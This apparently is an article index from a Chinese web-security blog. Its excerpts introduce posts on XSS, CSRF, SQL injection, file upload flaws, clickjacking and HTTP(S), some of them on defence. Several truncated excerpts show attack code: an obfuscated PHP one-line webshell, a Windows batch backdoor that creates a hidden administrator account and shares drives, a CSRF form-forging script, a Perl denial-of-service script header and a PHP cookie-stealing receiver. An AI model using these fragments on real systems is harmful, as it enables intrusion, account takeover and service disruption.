排序:
默认
按更新时间
按访问量

Python爬虫学习篇——————网络爬虫用到的库

抓取用到的python自带模块:urllib、urllib2、requests、httplib2等 Requests: import?requests response?=?requests.get(url) content?=?requests.get(url).content pri...

2017-04-10 16:20:04

阅读数:684

评论数:0

代码篇——————一句话木马

ASP系列         (密码是-7)     PHP系列             @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r&qu...

2017-04-05 17:40:18

阅读数:272

评论数:1

代码篇——————windows后门代码

@echo off      @net user zzunble zzunble.net /add @net localgroup administrators zzunble /add @net share c$=c: @net share d$=d: @net share e$=e:...

2017-03-21 12:33:38

阅读数:158

评论数:0

CSRF攻击代码

This page forges an HTTP POST request.       function post(url,fields)   {   //create a element.   var p = document.createElement("form"...

2017-03-13 17:47:43

阅读数:208

评论数:0

利用perl脚本执行拒绝攻击的代码

#!/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pip...

2017-03-13 10:40:08

阅读数:385

评论数:0

接收cookie代码与注入盗取cookie代码参考

document.write('');alert(/XSS/) $cookie = $_GET['cookie']; //以GET方式获取cookie变量值 $ip = getenv ('REMOTE_ADDR'); //远程主机IP地址 $time=date...

2017-03-13 10:34:53

阅读数:262

评论数:0

实例演示——————简单演示XSS store攻击,便于学习理解XSS store

此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。 一,环境搭建      1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。      2,准备盗取cookie代码。(该...

2017-03-09 11:16:41

阅读数:636

评论数:0

搜索的艺术————黑客语法

谷歌黑客语法:搜索也是一门艺术 intitle:搜索网页标题中包含有特殊字符的网页。如:intitle:cbi inurl:搜索包含有特定字符的URL intext:搜索网页正文内容中的指定字符。intext:to parent directory Filetype:搜索指定类型的文件 ...

2017-01-17 09:52:33

阅读数:206

评论数:0

web安全————PHP安全之文件包含漏洞

PHP安全问题     PHP由于灵活的语法成为目前非常流行的WEB开发语言,应用非常广泛。也是由于这个特点让PHP给安全工作带来了一些困扰。下面讨论PHP自身的语言问题。     文件包含漏洞:     文件包含漏洞也是代码注入的一种,代码注入的原理是注入一段用户能够控制执行的脚本或代码,...

2017-01-13 11:23:31

阅读数:913

评论数:0

web安全————文件上传漏洞

文件上传漏洞        所谓的文件上传漏洞是指用户上传了一个可执行脚本,并通过脚本文件获得执行服务器端命令 的能力。文件上传本身是没有问题的,它只是一种正常的业务需求,问题出在文件上传后服务器怎么处理、解释文件。文件上传后导致常见的安全问题一般包括:        1,上传文件是web脚...

2016-12-28 10:42:16

阅读数:253

评论数:0

web安全————注入(初识篇)

注入攻击        注入攻击是web安全领域中最常见的一种攻击方式。注入攻击的本质就是把用户输入的数据当作代码执行,主要的两个关键条件:第一是用户能够控制输入,第二是原本程序要执行的代码拼接了用户输入的数据。在注入中,常见的就是SQL,下面我们来看看SQL注入的一些方法、技巧以及防御。 ...

2016-12-22 10:00:11

阅读数:1046

评论数:0

web安全————clickjacking(点击劫持)

点击劫持(clickjacking)       点击劫持最早是在08年由安全专家Reboot Hansen和Jeremiah Grossman发现,这种攻击方式影响了几乎所有的桌面平台。那么什么是点击劫持??点击劫持其实是一种视觉上的欺骗手段,攻击者将一个透明的、不可见的iframe覆盖在一个...

2016-12-14 09:18:44

阅读数:3095

评论数:0

web安全————CSRF(防御篇)

CSRF防御之验证码      目前,验证码被认为是对抗CSRF攻击最简单有效的防御措施。用到验证码就是在请求过程中强制用户与应用进行交互,但是一个站点、一个好的产品要考虑到用户的体验,显然如果在所有的操作上都加入验证码对用户来说就很不友好。因此验证码只能是一种防御CSRF攻击的辅助手段,并不能成...

2016-12-08 10:18:04

阅读数:352

评论数:0

web安全————CSRF(攻击篇)

跨站请求伪造(CSRF)      首先先来看一个实例:当用户在某个论坛上删除某篇文章时,通过抓包获取请求如下:      http://blog.sohu.com/manage/entry.do?m=delete&id=12345678。用户登录后cookie为有效状态下,服务器接受...

2016-12-07 11:04:57

阅读数:284

评论数:0

web安全————XSS(预防篇)

现在市面浏览器都对XSS做了一些防范措施,如firefox的CSP、Noscrip扩展和IE8内置的XSS Filter等等。但是对于一个站点来说,这往往是不够的,还需要做出更优秀更好的方案防止XSS攻击。如httponly、输入检查、输出检查等等。      httponly是由微软提...

2016-12-01 10:47:17

阅读数:215

评论数:0

web安全————XSS(攻击篇)

所谓的跨站脚本攻击(XSS)是指攻击者通过“HTML注入”,从而对客户端的网页进行篡改,并且插入恶意代码(脚本),使用户在浏览网页时控制用户浏览器的一种攻击。因此XSS也成为了客户端的头号大敌,OWASP也因此多次把XSS列在TOP 10威胁的榜首。

2016-11-27 12:44:14

阅读数:515

评论数:0

web————针对web的攻击技术

在分析针对web的攻击前,先要明白http协议本身是不存在安全性问题的,就是说攻击者不会把它当作攻击的对象。而是应用了http协议的服务器或者客户端、以及运行在服务器的web应用资源才是攻击的目标。         针对web应用的攻击,主要分为主动攻击和被动攻击两种攻击模式           ...

2016-11-20 12:30:34

阅读数:140

评论数:0

web————http(认证篇)

HTTP/1.1认证方式有如下几种: 1,BASIC认证(基本认证) 2,DIGEST认证(摘要认证) 3,SSL客户端认证 4,FORMBASE认证(基于表单认证) BASIC认证:basic认证是在HTTP/1.0版本就定义的,目前由于它的不灵活性、达不到服务端所要求的安全等...

2016-11-18 09:41:14

阅读数:142

评论数:0

web————https(详解篇)

由于互联网的快速发展,网络的攻防技术在不断的更新,http协议也愈发不安全,其缺点主要表现为: 通信使用明文(不加密),内容可能会被攻击者窃听 不验证通信双方的身份,因此攻击者有可能伪装为任何一方完成攻击 无法证明报文的完整性,信息在通信过程中有可能已遭攻击者篡改         这...

2016-11-17 21:56:46

阅读数:185

评论数:0

web————http(报文详解篇)

http报文首部: 报文首部——————————在客户端与服务端处理时,重要信息几乎都在这里 空行(CR+LF) 报文主题——————————所需要的用户和资源信息都在这里 http请求报文中包含:报文请求的方法、url、http版本、http首部字段等。如: GET / HTT...

2016-11-16 11:40:06

阅读数:676

评论数:0

提示
确定要删除当前文章?
取消 删除
关闭
关闭